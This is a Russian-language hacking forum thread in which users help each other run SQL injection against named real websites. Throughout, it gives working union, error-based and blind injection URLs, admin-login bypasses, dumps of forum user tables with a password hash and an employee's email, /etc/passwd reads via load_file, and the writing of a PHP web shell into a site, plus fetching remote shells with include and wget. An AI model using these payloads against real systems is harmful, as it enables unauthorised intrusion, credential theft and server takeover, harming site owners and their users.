Выдаёт вот такую ошибку



Всё получилось ))) Спасибо лови от меня +

Вот как надо было admin' or '1'='1' -- and password

И можно описание данного кода?

именно вот этого куска: admin' or '1'='1' --

Ладно в админку то я попал.. но это было не особо гланым...

Как вытащить пароль из базы?
Заранее спасибо)
Мда, после -- пробел должен быть, в первом запросе ты его не поставил, во втором он есть, вот и сработало.

Небольшой вопросик , не подкинете хороший словарик для перебора таблиц/колонок ?

а если при инекции есть такоы ошибка

+union+select+0 i vot osibka..
Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

и зделал /*!sql*/ (WАF) НЕ помоq..

с чего ты взял что это вообще уязвимость?

Помогите вот с этой инъекцией:
http://www.bdva.ru/arhiv.phtml?id=146+and+1=0+union+select+1,2,3,user name,user_password,5,6,7,8,9,10,11+from+phpbb_user s+limit+1,1+--+
Нашел колонки из этой таблицы, ввожу, а пишет что таблицы - нет. Что не так делаю?

Помогите вот с этой инъекцией:

Нашел колонки из этой таблицы, ввожу, а пишет что таблицы - нет. Что не так делаю?

Потому что находится в другой базе данных скорее всего.

Потому что находится в другой базе данных скорее всего.
А как можно поменять бд в запросе?
Вот ошибка такая:
Table 'bdva.phpbb_user' doesn't exist
Т.е. нет таблицы.
Что посоветуете сделать?

Если я правильно понял, то в этой таблице логины и пассы от форума, мб не та бд.
Что делать?

http://www.bdva.ru/arhiv.phtml?id=146+and+1=0+union+select+1,2,3,conc at_ws(0x3a,username,user_password),5,6,7,8,9,10,11 +from+%60bdva-forum%60.phpbb_users--+
[-_-]

http://www.bdva.ru/arhiv.phtml?id=-146+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--

Version = 5.0.77-log
User = bdva_sql@78.140.133.152
Database = bdva


Database:bdva-forum

information_schema
bdva
bdva-forum

Tables:phpbb_users
phpbb_auth_access
phpbb_banlist
phpbb_categories
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_privmsgs
phpbb_privmsgs_text
phpbb_ranks
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_sessions_keys
phpbb_smilies
phpbb_themes
phpbb_themes_name
phpbb_topics
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_vote_desc
phpbb_vote_results
phpbb_vote_voters
phpbb_words

Columns: Table phpbb_users
user_active
username
user_password
user_session_time
user_session_page
user_lastvisit
user_regdate
user_level
user_posts
user_timezone
user_style
user_lang
user_dateformat
user_new_privmsg
user_unread_privmsg
user_last_privmsg
user_emailtime
user_viewemail
user_attachsig
user_allowhtml
user_allowbbcode
user_allowsmile
user_allowavatar
user_allow_pm
user_allow_viewonline
user_notify
user_notify_pm
user_popup_pm
user_rank
user_avatar
user_avatar_type
user_email
user_icq
user_website
user_from
user_sig
user_sig_bbcode_uid
user_aim
user_yim
user_msnm
user_occ
user_interests
user_actkey
user_newpasswd
user_login_tries
user_last_login_try

Спс! Все пашет!
Скажите, а как вы узнали другую бд?
И почему при "bdva-forum.phpbb_users" ошибка,
а "`bdva-forum`.phpbb_users" все ок?

Спс! Все пашет!
Скажите, а как вы узнали другую бд?
И почему при "bdva-forum.phpbb_users" ошибка,
а "`bdva-forum`.phpbb_users" все ок?
Потому что MySQL неправильно (для тебя) интерпретирует символ "-", а обрамив название БД кавычками ты ей даешь знать, что именно это - имя базы.

CyberHunter, все что тебе может пригодиться(или почти все) всегда лежит в текущей бд, а текущую бд узнаешь в самом начале с помощью database()

CyberHunter, все что тебе может пригодиться(или почти все) всегда лежит в текущей бд, а текущую бд узнаешь в самом начале с помощью database()
Откуда такая уверенность? Приведу пример (у меня біл реально такой случай). Был сайт, какие-то объявления. Здесь же была скуля. На этом же сайте же сайте был форум, таблицы которого находилась в отдельной БД, а в текущей - только таблички новостей.

Так что не факт, что на сайте используется только одна основная БД.

От чего зависит, когда при иньекции скрипт начнет сливать всю информацию из таблицы, а когда - по одной строке(придется использовать лимиты)?
Для понятности вопроса имеем, к примеру, иньекцию с полем 2, которое выводится:
http://site.com/user.php?id=-1+UNION+SELECT+1,2,3--
При
http://site.com/user.php?id=-1+UNION+SELECT+1,username,3--
будет получена только 0 строка из таблицы. Чтобы получить остальные данные, придется использовать лимит, но выводится будет все равно только одна строка.

Есть ли способы во втором случае сливать более чем одну строку за запрос?

От чего зависит, когда при иньекции скрипт начнет сливать всю информацию из таблицы, а когда - по одной строке(придется использовать лимиты)?
Для понятности вопроса имеем, к примеру, иньекцию с полем 2, которое выводится:
http://site.com/user.php?id=-1+UNION+SELECT+1,2,3--
При
http://site.com/user.php?id=-1+UNION+SELECT+1,username,3--
будет получена только 0 строка из таблицы. Чтобы получить остальные данные, придется использовать лимит, но выводится будет все равно только одна строка.

Есть ли способы во втором случае сливать более чем одну строку за запрос?
использовать group_concat(username)

А одна строка потому что в скрипте строка mysql_fetch_row не в цикле, а вызывается один раз

Nek1t, да. Есть ф-ция group_concat, но её использование ненадежно, т.к. она имеет лимит вывода - 1000 символов.

Nek1t, да. Есть ф-ция group_concat, но её использование ненадежно, т.к. она имеет лимит вывода - 1000 символов.
можно получать больше 1000 символов если использовать такою конструкцию
union+select+1,group_concat(username),3+from+table +where+username>'последнего полученного_значения'
т.к. результат сортируется по алфавиту

Nek1t, да. Есть ф-ция group_concat, но её использование ненадежно, т.к. она имеет лимит вывода - 1000 символов.

Можно всё одним запросом получить - читай эту тему (https://forum.antichat.ru/thread118842.html).

Можно всё одним запросом получить - читай эту тему (https://forum.antichat.ru/thread118842.html).
ИМХО самое нужное в той теме - это чтобы при просмотре таблиц не включать information_schema(ИМХО лучше всего получать таблицы вообще по базам) и то что выводится по алфавиту

Можно всё одним запросом получить - читай эту тему (https://forum.antichat.ru/thread118842.html).
кстати, group_concat тоже можно загнать в бенчмарк, теоретически база сдампится быстрее,
последний полный кейворд можно определять например так: (набросал схематически, возможны косяки):
@c:=substring(left(reverse(group_concat(table_name separator '@@')),locate('@@',reverse(group_concat(table_name separator '@@')))+2),1,locate('@@',left(reverse(group_concat (table_name separator '@@')),locate('@@',reverse(group_concat(table_name separator '@@')))+2)))
/add или коротко:
@a:=reverse(group_concat(user order by user separator '@@'))
@b:=locate('@@',@a)
@c:=left(@a,@b+2)
@d:=substring(@c,1,locate('@@',@c))
.. where user>@d
ИМХО самое нужное в той теме - это чтобы при просмотре таблиц не включать information_schema
where table_schema!='information_schema' в чем проблема ;)

SELECT @count:=1, @out:=' ', BENCHMARK(10, @out:=CONCAT(@out,'<br>',(SELECT CONCAT_WS(';',name,password,@count:=IFNULL(@count+ 1,@count)) FROM users WHERE id_user=@count LIMIT 0,1))), @out
Посмотрел, но не совсем уловил принцип. А если id_user вообще нет?
У меня вывод поля идет в заголовки, так что вывести всю таблицу скорее всего не удасться просто в принципе.

union+select+1,group_concat(username),3+from+table +where+username>'последнего полученного_значения'
Вот тут заминка: username>'последнего полученного_значения'
Это ничего не дало - записи выводятся так же с первой и до 1024 символа.
И то, что username - строковый параметр, не влияет на операцию сравнения?

Вот тут заминка: username>'последнего полученного_значения'
Это ничего не дало - записи выводятся так же с первой и до 1024 символа.
И то, что username - строковый параметр, не влияет на операцию сравнения?
Если у тя magic_quotes_gps on то надо привести к hex строку.
можно посмотреть на поле id и использовать его(оно зачастую auto_increment)

Все, разобрался, просто опечатался в запросе, а в hex знаю, что переводить надо.
Единственный вопрос, как быть с теми случаями, когда нет столбца с id?

Все, разобрался, просто опечатался в запросе, а в hex знаю, что переводить надо.
Единственный вопрос, как быть с теми случаями, когда нет столбца с id?
так я ж говорю, просто в твоём случае использовать username

Подскажите вот сайт:
http://www.garmin.ua/catalog/maps/?id=1163%27
Я так понял, что это слепая инъекция. Т.е. количество полей возможно подобрать, так чтобы отобразилась страница 1163, но что делать дальше если нет принтабельных полей? Брутить? Если да то как это сделать?
З.Ы. Слепые инъекции - это типа blind?

http://www.garmin.ua/catalog/maps/?id=1163+and+substring(version(),1,1)=4


4-ая ветка, есть табла users

Подскажите вот сайт:

Я так понял, что это слепая инъекция. Т.е. количество полей возможно подобрать, так чтобы отобразилась страница 1163, но что делать дальше если нет принтабельных полей? Брутить? Если да то как это сделать?
З.Ы. Слепые инъекции - это типа blind?
Почему же она слепая????

http://www.garmin.ua/catalog/maps/?id=1163+and+1=2+union+select+null,version(),null, null,null,null,null,null,null+--+

Но версия всё равно 4ка

Почему же она слепая????
Я так подумал, потому что не было ошибок :)
Хотел спросить что делает вот это: "+and+1=2" ?
И почему вместо 1,2,3,... пишется нулл,нулл,... ?

Я так подумал, потому что не было ошибок :)
Хотел спросить что делает вот это: "+and+1=2" ?
И почему вместо 1,2,3,... пишется нулл,нулл,... ?
1111+and+1=2 (false) даёт в резальтате false(типа как -1).

а null это типо отсутствие значения

1111+and+1=2 (false) даёт в резальтате false(типа как -1).

а null это типо отсутствие значения
Зачем его использовать непойму :)
-1 union select a,b --
Проще помоему =\

Зачем его использовать непойму :)
-1 union select a,b --
Проще помоему =\
1) это дело привычки
2)

http://kip.medaar.ru/prod.php?idsub=-1+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1



http://kip.medaar.ru/prod.php?idsub=105+and+1=2+union+select+1,2,3,4,5, 6+--+&idkat=20&idsup=1

(долго это искал чтоб показать)

1) это дело привычки
2)

http://kip.medaar.ru/prod.php?idsub=-1+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1



http://kip.medaar.ru/prod.php?idsub=105+and+1=2+union+select+1,2,3,4,5, 6+--+&idkat=20&idsup=1

(долго это искал чтоб показать)
http://kip.medaar.ru/prod.php?idsub=999+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
На - реагирует :)

подскажите пожалуйста, как можно снять дамп бд не имея веб шелла т.е. есть скл иньекция, есть вывод всех таблиц и колонок, содержимого... но проблема в том что БД очень большая и незнаю такой тулзы которым можно автоматизировать процесс т.к делать запрос where+table_name и тем более выдерать оттуда данные не очень удобно.((
СИПТ либо настроил неправильно, либо руки растут оттуда откуда сижу, скорее второе (

подскажите пожалуйста, как можно снять дамп бд не имея веб шелла т.е. есть скл иньекция, есть вывод всех таблиц и колонок, содержимого... но проблема в том что БД очень большая и незнаю такой тулзы которым можно автоматизировать процесс т.к делать запрос where+table_name и тем более выдерать оттуда данные не очень удобно.((
СИПТ либо настроил неправильно, либо руки растут оттуда откуда сижу, скорее второе (
не очень удобно это как??

таблиц и данных в БД много, вбивать вручную имя каждой таблицы, колонки и выдирать оттуда данные = пальцы устали(

таблиц и данных в БД много, вбивать вручную имя каждой таблицы, колонки и выдирать оттуда данные = пальцы устали(

А group_concat использовать пробовал?

нет,если б знал как правильно составить запрос((
СИПТ либо настроил неправильно, либо руки растут оттуда откуда сижу, скорее второе (

точно второе...
пошел РТФМ

http://www.ecominfo.spb.ru/about/print.php?id=1211+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+
Скажите, а это уже слепая?

Скажите, а это уже слепая?
http://www.ecominfo.spb.ru/about/print.php?id=-1211+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),database(),version()),15,16,17 ,18,19,20,21,22,23,24,25,26+--+

:'(

http://www.ecominfo.spb.ru/about/print.php?id=-1211+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26+%20--+

а чо бы ей быть слепой?вывод есть!

Скажите, а это уже слепая?
Слепота в каком месте???

http://www.ecominfo.spb.ru/about/print.php?id=1211+and+1=2+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21, 22,23,24,25,26+--+

Слепота в каком месте???
Бля ошибок - нет(не было). Или я туплю :(

если error_reporting(0) это уже блинд?

неа! если error_reporting(0) то токо ошибки отключаются, а не выводимые поля

Скажите вот есть сайт:
http://www.oxta.ru/index.php?id=152
При вводе кавычек нет ошибки (пробовал '; -- и ' vav va).
Таких сайтов много видел как с ними работать? Как можно раскрутить скулю на таком сайте?

Как можно раскрутить скулю на таком сайте?


а она там есть?

Скажите вот есть сайт:

При вводе кавычек нет ошибки (пробовал '; -- и ' vav va).
Таких сайтов много видел как с ними работать? Как можно раскрутить скулю на таком сайте?
Я с тебя херею.... Ты думаешь что скуля на всех сайтах?

CyberHunter, перестань задавть эти вопросы и прочитай хотя бы одну статью по SQL-инъекциях.

Скажите вот есть сайт:

При вводе кавычек нет ошибки (пробовал '; -- и ' vav va).
Таких сайтов много видел как с ними работать? Как можно раскрутить скулю на таком сайте?
там нету, но есть например здесь

http://oxta.ru/news.php?y=2009&m=12+and+5=5

и кстати не стоит замарачиваться, тут тот тоже скуля есть:
http://oxta.ru/admin
login: 'or+5=5/*
password: asdfg
удачи ;)

select * from users where login='admin' or 1='1' and passwd='202cb962ac59075b964b07152d234b70'

Можно в админку попасть тут?

select * from users where login='admin' or 1='1' and passwd='202cb962ac59075b964b07152d234b70'

Можно в админку попасть тут?
поидее да, если пароль верный, и админ первый в таблице. А закомментить строку так можно?

select * from users where login='admin' or 1=1+--+'

если да, то зайдёшь под логином первого из результата select * from users (обычно админ)

select * from users where login='admin' or 1='1' and passwd='202cb962ac59075b964b07152d234b70'

Можно в админку попасть тут?


select * from users where login='admin' or 1=1/*' and passwd='202cb962ac59075b964b07152d234b70'

Точно не уверен,попробуй

поидее да, если пароль верный, и админ первый в таблице. А закомментить строку так можно?

select * from users where login='admin' or 1=1+--+'

если да, то зайдёшь под логином первого из результата select * from users (обычно админ)


Да, комменты я пробовал - не получалось. Неправильно делал.

Я забыл про закрывающую кавычку и камент, сделал так

select * from users where login='admin' or 1='1' -- and passwd='202cb962ac59075b964b07152d234b70'


пустило.

Да, комменты я пробовал - не получалось. Неправильно делал.

Я забыл про закрывающую кавычку и камент, сделал так

select * from users where login='admin' or 1='1' -- and passwd='202cb962ac59075b964b07152d234b70'


пустило.
# еще можна использовать, если используеться гет, то перевести в 16-ную...

на одном сайте есть уязвимость но все метады уже проверил не какой не идет.. проходит тока этот +AND+ascii(substring(version(),1,1))>117/* а так не идет +AND+ascii(substring((select+table_name+from+infor mation_schema.tables),1,1))>117/* как дальше продолжеть?
так тоже пробовал or(select+count(*)from(information_schema.columns)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/1,1)/* ...

']на одном сайте есть уязвимость но все метады уже проверил не какой не идет.. проходит тока этот +AND+ascii(substring(version(),1,1))>117/* а так не идет +AND+ascii(substring((select+table_name+from+infor mation_schema.tables),1,1))>117/* как дальше продолжеть?
так тоже пробовал or(select+count(*)from(information_schema.columns)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/1,1)/* ...может схемы просто нет (ветка ниже) или код символа ниже возьми...
скрипт (https://forum.antichat.ru/thread19844-blind.html) (нижний пост) заюзай хоть и на пхп или другой инструмент возьми, если слепая.

там внизу под ошибкой sql стоит
[XT SQL Error]
что это??
и ище очень часто я встречяюсь с этим
You have an error in your SQL syntax;...................

[TEP STOP]
и разкрутить вроде неразу не удалось.. что это может быть?

объясни что знaчит проходит и нe проходит, т.к. пeрвый зaпрос должeн дaть пустой рeзультaт

Ну смотрим кто что скажет...
http://azone-it.ru/index.php?option=com_content&task=view&id=30&Itemid=52'
выпригует алерт с ошибкой выполнения запроса (логирования)...
самое интересное что это компания которая проводит аудит безопасности :)

И вот тоже :) как блинд крутить можно ...
http://www.lins-m.ru/index.php?ID=51+and+5=(select%20version())--+

О компании
Компания «ЛИНС-М» предлагает следующий перечень профессиональных услуг для обеспечения безопасности ИС организаций
с юнион мну не получилось...

Ну смотрим кто что скажет...

выпригует алерт с ошибкой выполнения запроса (логирования)...
самое интересное что это компания которая проводит аудит безопасности :)

И вот тоже :) как блинд крутить можно ...


О компании

с юнион мну не получилось...


MySQL версия 5.0.67
Data Бaзы:information_schema
b10160_forum
b10160_fresh
b10160_linsm
Current User: u10160@78.108.81.111

http://www.lins-m.ru/index.php?ID=-1+union+select+1,%28SELECT+concat%280x7e,0x27,phpb b_users.user_password,0x27,0x7e,phpbb_users.userna me,0x27,0x7e,phpbb_users.user_email,0x27,0x7e,phpb b_users.user_id,0x27,0x7e%29+FROM+b10160_forum.php bb_users+LIMIT+2,1%29%20,3,4,5--

~'880cbc1ed48043cbcdaa7286e058ef7f'~Евгений '~enevzorov@lins-m.ru'~3'~

']MySQL версия 5.0.67
Data Бaзы:information_schema
b10160_forum
b10160_fresh
b10160_linsm
Current User: u10160@78.108.81.111

http://www.lins-m.ru/index.php?ID=-1+union+select+1,%28SELECT+concat%280x7e,0x27,phpb b_users.user_password,0x27,0x7e,phpbb_users.userna me,0x27,0x7e,phpbb_users.user_email,0x27,0x7e,phpb b_users.user_id,0x27,0x7e%29+FROM+b10160_forum.php bb_users+LIMIT+2,1%29%20,3,4,5--

~'880cbc1ed48043cbcdaa7286e058ef7f'~Евгений '~enevzorov@lins-m.ru'~3'~
молодец ступил просто
когда посылал http://www.lins-m.ru/index.php?ID=50+order+by+4--+ то контент выводился,
а когда http://www.lins-m.ru/index.php?ID=50+order+by+5--+ нет , и решил шо 4 поля, +++ :)
Сайт походу умер, за ним не следять так как Copyright © 2008, LINS-M... Просто целесообразно текущий год ставить, имхо...

Дальше сам ;)
http://www.enlighteneddating.com/softbizDatingScript/products.php?cid=49+and+1=0+union+select+1,version (),3,4,5--

http://www.enlighteneddating.com/softbizDatingScript/search_results.php?browse=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws( 0x3a,version(),database(),user()),30,31,32,33,34,3 5,36,37,38,39/*
...

вот есть саyт..

версия 4.1.18..есть mysql.user и file_priv Y..

хочу заливать шелл..

читаю /etc/passwd
http://www.georgica.net/analitic/?page=ru&id=-303'+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8+from+mysql.user+--+


а потом '/'
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/%27),4,5,6,7,8+from+mysql.user+--+

а здесь видно папка

http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/home/www/htdocs/%27),4,5,6,7,8+from+mysql.user+--+

и потом здеlaю так..

http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+%3C?include($_GET[%22cmd%22]);?%3E,1,2,3,4,5,6,7+from+mysql.user/**/into/**/outfile/**/%27/home/www/htdocs/rfi.php%27/*

http://www.georgica.net/rfi.php?cmd=http://azattacker.org/forum/c99.txt?

и не получается

обшем поjaлуста помоqите заливат шелл

вот есть саyт..

версия 4.1.18..есть mysql.user и file_priv Y..

хочу заливать шелл..

читаю /etc/passwd
http://www.georgica.net/analitic/?page=ru&id=-303'+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8+from+mysql.user+--+


а потом '/'
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/%27),4,5,6,7,8+from+mysql.user+--+

а здесь видно папка

http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/home/www/htdocs/%27),4,5,6,7,8+from+mysql.user+--+

и потом здеlaю так..

http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+%3C?include($_GET[%22cmd%22]);?%3E,1,2,3,4,5,6,7+from+mysql.user/**/into/**/outfile/**/%27/home/www/htdocs/rfi.php%27/*

http://www.georgica.net/rfi.php?cmd=http://azattacker.org/forum/c99.txt?

и не получается

обшем поjaлуста помоqите заливат шелл

чё то я не могу понять а вывод, то есть команды?
вот чё то я пеопробовал и файло у меня не перечиталось

LokbatanLi!как то ты по извращенному льешь шелл


Вот! http://www.georgica.net/temp/1.php?id=ls

вывод в файл работает!
http://www.georgica.net/analitic/?page=ru&id=-303'+UNION+SELECT+0x3C3F206563686F20223C7072653E22 3B6563686F2073797374656D28245F4745545B226964225D29 3B6563686F20223C2F7072653E22203F3E,2,3,4,5,6,7,8+F ROM+mysql.user+INTO+DUMPFILE+'/home/www/htdocs/temp/1.php'+--+

все норм

Rubaka
a qde shell ??

http://www.georgica.net/temp/1.php?id=http://azattacker.org/forum/c99.txt?

Вот шелл http://www.georgica.net/temp/1.php?id=ls <------в id комманды передаешь!!
а не инклюдишь!
тама код system($_GET["id"]); прописан!

и ты могешь мля не писать транслитом!!!!!!!!!!!

net ne kak ne moqu ponyat izvini..

Подскажите плиз. http://met-con.com/images/?w=700&src=/images/properties/dump%20oct%2019%202009%20110.jpg

там есть читалка?

скуля есть
http://met-con.com/mdc/index.php?page=-1+union+select+1,concat(version(),0x40,database(), 0x40,user()),3,4,5--+
5.0.89-community@metcon_web@metcon_webuser@localhost

Скажите, если у меня есть логин и пароль админа сайта, как залогинится под ним?
На сайте нет возможности ввести логин, пасс. Слышал, что можно залить шелл, или это не то?
У кого есть ссылка на какую-то статью на эту тему напишите.

скуля есть
http://met-con.com/mdc/index.php?page=-1+union+select+1,concat(version(),0x40,database(), 0x40,user()),3,4,5--+
5.0.89-community@metcon_web@metcon_webuser@localhost
да я знаю.но мне она нах не нужна, т.к. там .htpasswd auth

Скажите, если у меня есть логин и пароль админа сайта, как залогинится под ним?
На сайте нет возможности ввести логин, пасс. Слышал, что можно залить шелл, или это не то?
У кого есть ссылка на какую-то статью на эту тему напишите.
Шелл пока немного не то. Хотя смотря каким макаром ты достал логин и пасс.
Попробуй поискать админку. www.site.ru/admin
или другие варианты мб adm.php ну вобщем дофига. Если нет то пиши лс и адресок сайта мб помогу.

Попробуй поискать админку. www.site.ru/admin
или другие варианты мб adm.php ну вобщем дофига. Если нет то пиши лс и адресок сайта мб помогу.
Это знаю, пробивал - нет.
А почему шелл - не то? Дайте у кого есть инфу на эту тему.

Дак думаю про mysql.user и file priv = Y и ковычки ты знаешь тут объяснять не надо. Ты способ скажи каким ты пароли достал скули и мб СИ ? А в админку мб вход только с определенных IP ?

http://extensis.cnrc.navy.mil/index.htm?content=http://google.com

Помогите довести до ума http://files.myopera.com/Creat0R/Opera_AC/Icons/Kolobki/book.gif

Дак думаю про mysql.user и file priv = Y и ковычки ты знаешь тут объяснять не надо. Ты способ скажи каким ты пароли достал скули и мб СИ ? А в админку мб вход только с определенных IP ?
Админку достал из БД. В таблице юзеров был и админ. Так как это реализовать?

Бд слита или есть доступ к phpmyadmin?

http://extensis.cnrc.navy.mil/index.htm?content=http://google.com

Помогите довести до ума http://files.myopera.com/Creat0R/Opera_AC/Icons/Kolobki/book.gif


Обычный фрейм.

Бд слита или есть доступ к phpmyadmin?
Я просто прочитал бд и увидел там ники и пароли юзеров. Доступа к пхпадмин - нет.

Кинь адрес сайта в ПМ попробую посмотреть...

Обычный фрейм.
Сделать ничего нельзя?

Сделать ничего нельзя?
нет..

Люди подскажите если в ошибке, что-то типа:
Invalid data 2170; -- for CFSQLTYPE CF_SQL_INTEGER.

The error occurred in C:\Inetpub\wwwroot3\plugins\frontEnd\content.cfm: line 137

135 : AND clientID = <cfqueryparam cfsqltype="cf_sql_integer" value="#session.clientID#">
136 : <cfif isDefined("from") and from eq "backend">
137 : <cfelse>
138 : AND active = 1
139 : </cfif>

Что это значит? Дайте ссыль на инфу по этих инъекциях.

Есть слепая sql, не могу вывести из таблицы поля, помогите. Таблица ollis, смотрю так же inf_sch, что не то?

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+

Люди подскажите если в ошибке, что-то типа:

Что это значит? Дайте ссыль на инфу по этих инъекциях.


обычная скуля мускульная , только скрипт на coldfusion и, походу, требует чтоб ID был цифровой - внедрить что-либо нельзя (это просто предположение, исходя из того что ты дал)

Вот смотри:
http://www.asthmansw.org.au/content.cfm?id=2170

Вот смотри:
Как сказал попугай, это просто ошибка из-за того что GET параметр ID не числовой, это так принято выводить ошибки в ASP.NET, и т.п. системах )

Есть инъекция в MSSQL - выводит ошибку (с полным query) только если incorrect syntax, все остальные не показываются.
Задача - сделать вывод нужных данных в этой ошибке, т.е. используя выполнение многих запросов за раз с точкой с запятой, засунуть результат селекта в сам запрос.

Составил пока такой запрос:
declare @v as varchar(2048)
select @v = @@version;
exec @v

Msg 203, Level 16, State 2, Line 7
The name 'Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Developer Edition on Windows NT 6.1 (Build 7600: )
' is not a valid identifier.

Но ошибка вылазит, как видно, не на синтакс.
Может есть идеи?

Чтобы было понятнее: хочу получить вот такую ошибку:
Incorrect syntax: Microsoft
SQL : SELECT id, desc from table1 where id='-1';...сам хитрый запрос...; select Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 6.1 (Build 7600: )

Есть инъекция в MSSQL - выводит ошибку (с полным query) только если incorrect syntax, все остальные не показываются.
Задача - сделать вывод нужных данных в этой ошибке, т.е. используя выполнение многих запросов за раз с точкой с запятой, засунуть результат селекта в сам запрос.

Составил пока такой запрос:

Но ошибка вылазит, как видно, не на синтакс.
Может есть идеи?

Чтобы было понятнее: хочу получить вот такую ошибку:
Incorrect syntax: Microsoft
SQL : SELECT id, desc from table1 where id='-1';...сам хитрый запрос...; select Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 6.1 (Build 7600: )


А зачем получать именно в таком виде ошибку? Главное же, что вывод данных есть. Можно данные ещё конкатенизировать с какими-то символами, провоцирующими ошибку при exec.

А зачем получать именно в таком виде ошибку? Главное же, что вывод данных есть. Можно данные ещё конкатенизировать с какими-то символами, провоцирующими ошибку при exec.
Единственный вывод данных - это ругание на ошибку в синтаксе, т.е. когда сам запрос не может выполниться из-за скажем кавычки внутри или вызова несуществующей функции. Все остальные ошибки (на приведение типов например - convert (int, @@version)) никак себя не проявляют...

PS Приведенная мною ошибка в том посте про incorrect identifier - это результат на локальной системе, на самом сайте она не показывается.

порутал сервер,когда заливаю на сайты шеллы и потом обращаюсь к ним из веба,то выдает такую ошибку -


UID of script "/home/*****/public_html/shell.php" is smaller than min_uid


выставил чмоды и выдает уже такую ошибку -


File "/home/*****/public_html/shell.php" is writeable by group


как сделать что бы шелл нормально работал?

:.']порутал сервер,когда заливаю на сайты шеллы и потом обращаюсь к ним из веба,то выдает такую ошибку -


UID of script "/home/*****/public_html/shell.php" is smaller than min_uid


выставил чмоды и выдает уже такую ошибку -


File "/home/ufaserv/public_html/wso2.php" is writeable by group


как сделать что бы шелл нормально работал?


шелл должен иметь владельца такого же, как и все файлы в папке (chown ufaserv wso.php) и права 755

шелл должен иметь владельца такого же, как и все файлы в папке (chown ufaserv wso.php) и права 755

GID of script "/home/*****/public_html/wso2.php" is smaller than min_gid

:(

UPD: chown username:username * -R , так заработало


я открыл консоль на сервере..как закачать полноценный шелл ? права рут.

wget http://yoursite.ru/shell.php -O yaneshell.php

xeksite.ru/yaneshell.php

я открыл консоль на сервере..как закачать полноценный шелл ? права рут.

Скажите, как можно имея ник и пасс админа, изменить исходный код сайта (например ифрейм поставить)? На сайте не возможно залогинится. Как можно реализовать?

Имеется такой код:


$filetype = $_FILES['imagen']['type'];
$name = $_FILES['imagen']['name'];
$extension = get_extension($name);
$imagen = $id.".".$extension;

if (!((strpos($filetype, "gif") || strpos($filetype, "jpeg") || strpos($filetype, "bmp"))))
{
$message = "Error";
}

Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так?

Имеется такой код:



Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так?
Да.

я открыл консоль на сервере..как закачать полноценный шелл ? права рут.

Не понял )).Ну,как бы команды wget,lynx,source никто не отменял:).И вообще,консолей много всяких...может,ты вообще сидел за терминалом рядом с системником?))))

ЗЫ: Я так понял,у тебя bash/csh или чет такое.

http://www.simqam.com/products.php?cid=48%2b1=1

Никак не могу подобрать колонки, тич литл ступид асс холл плис

http://www.simqam.com/products.php?cid=48%2b1=1

Какбы там блайнд:
http://www.simqam.com/products.php?cid=1+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(version(),floor(rand(0)*2)))--+

Result:
Duplicate entry '5.0.67-log1'

Какбы там блайнд:
http://www.simqam.com/products.php?cid=1+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(version(),floor(rand(0)*2)))--+

Result:
Duplicate entry '5.0.67-log1'


Sorry за возможно глупый вопрос
В блайндах всегда возможно только выводить по одной строке(значению) или есть такой запрос позволяющий выводить сразу столбом. FAQ я читал и не раз и не два
т.е. например я делаю такой запрос

+UNION+SELECT+*+FROM(SELECT%20*%20FROM%20(SELECT%2 0NAME_CONST((SELECT%20name%20FROM%20users%20LIMIT% 200,1),%2014)d)+as+t+JOIN(SELECT%20NAME_CONST((SEL ECT%20name%20FROM%20users%20LIMIT%200,1),14)e)b)a% 20--

выводит: Duplicate entry: qwerqwer

Выводит только одно значение хоть с лимитом, хоть без него можно ли вывести данные целиком?

Нет, хотя стоп, я же выводил login:password =\

Мля, начал линки ис топика по скулям проверять ):
Мне интересно стало http://site:3306

Вопрос 1:
Как такое прыкрыть (рационально всмысле)!?


Вопрос 2:
Какие есть вариации каталога по умолчанию для выполнения cgi скриптов(и др. каталоги) у разных веб-серверов с компроментирующими даными ?
сgi-bin/test.pl - например , денвер.
результат - путь.

